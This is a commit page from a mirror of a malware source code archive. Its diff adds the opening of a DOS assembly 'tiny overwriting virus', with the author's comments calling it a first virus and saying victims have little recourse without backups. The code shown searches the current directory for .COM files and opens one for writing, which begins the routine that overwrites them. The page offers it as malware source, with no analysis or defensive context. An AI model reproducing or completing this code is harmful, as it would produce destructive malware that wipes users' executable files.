mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
Add files via upload
This commit is contained in:
@@ -0,0 +1,23 @@
|
||||
;AuVS.tiny.OVERWRITING.0001
|
||||
|
||||
;My 1st VIRUS!!!!!!!!!!!!!!
|
||||
|
||||
;This is an extremely simple overwriting, tiny virus, that is easy to
|
||||
|
||||
;detect, but there's not much to do to clean it if you have no backups
|
||||
|
||||
;F-PROT detects this as an unknown TRIVIAL variant
|
||||
|
||||
START:
|
||||
|
||||
mov ah,4Eh ;Find first *.COM file in current dir
|
||||
|
||||
lea dx,OFFSET MASK ;*.COM
|
||||
|
||||
xor cx,cx ;xero out da register
|
||||
|
||||
int 21h ;find
|
||||
|
||||
mov dx,009Eh ;file handle
|
||||
|
||||
mov ax,3D01h ;open file for writing
|
||||
Reference in New Issue
Block a user